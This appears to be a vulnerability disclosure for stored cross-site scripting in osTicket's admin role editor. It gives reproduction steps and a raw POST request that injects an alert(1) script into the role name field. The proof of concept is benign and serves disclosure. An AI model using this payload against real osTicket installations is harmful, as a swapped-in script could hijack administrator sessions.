Description

Stored cross-site scripting vulnerabilities arise when user input is stored and later embedded into the application’s responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

Following agent authentication, with the need of administrative privileges or the ability to create, edit or delete roles within the application, an attacker can take advantage of insufficient control of the user input on the POST parameter name used while editing an existing role, such as the default one All Access, to inject arbitrary javascript code that will be permanently stored. In this way, the input entered by the attacker will be triggered whenever the list of roles in scp/roles.php is displayed or, in general, whenever the role management form is present, such as while creating a user or editing an existent one.

Steps-To-Reproduce

• Log into the osTicket agent login form at osTicket/scp/login.php using a privileged user.

• Switch to the Admin Panel in the upper right corner.

• Move to the Agents > Roles assignment form at osTicket/scp/roles.php.

• Here, you can both choose to create a new role or edit an existent one. For this PoC we’ll be using the default privileged one, namely All Access, so select it to proceed with the role update.

• In the Name label, inject the XSS payload <script>alert(1)</script> right after the All Access string. The input will look like the following All Access<script>alert(1)</script>. Then, saving your changes you’ll be notified that the role has been updated successfully.

• Browse again the Agents > Roles assignment form at osTicket/scp/roles.php to see the XSS popping up whenever the list of roles is fetched. It will also trigger in osTicket/scp/staff.php while choosing to add a new agent, since the list of roles is fetched in the Access tab.

Proof of Concept

POST /osTicket/scp/roles.php?id=1 HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 734
Origin: http://<REDACTED>
Connection: close
Referer: http://<REDACTED>/osTicket/scp/roles.php?id=1
Cookie: OSTSESSID=3c90r6qlsn81b655j5jhd9ef37
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
DNT: 1
Sec-GPC: 1

submit=Save+Changes&__CSRFToken__=e47cedfc19cd4b0fc3be44f07078f7238ace7b63&do=update&a=&id=1&name=All%20Accessqtfkh%3cscript%3ealert(1)%3c%2fscript%3eeupzn&notes=%3Cp%3ERole+with+unlimited+access%3C%2Fp%3E&perms%5B%5D=ticket.assign&perms%5B%5D=ticket.close&perms%5B%5D=ticket.create&perms%5B%5D=ticket.delete&perms%5B%5D=ticket.edit&perms%5B%5D=thread.edit&perms%5B%5D=ticket.link&perms%5B%5D=ticket.markanswered&perms%5B%5D=ticket.merge&perms%5B%5D=ticket.reply&perms%5B%5D=ticket.refer&perms%5B%5D=ticket.release&perms%5B%5D=ticket.transfer&perms%5B%5D=task.assign&perms%5B%5D=task.close&perms%5B%5D=task.create&perms%5B%5D=task.delete&perms%5B%5D=task.edit&perms%5B%5D=task.reply&perms%5B%5D=task.transfer&perms%5B%5D=canned.manage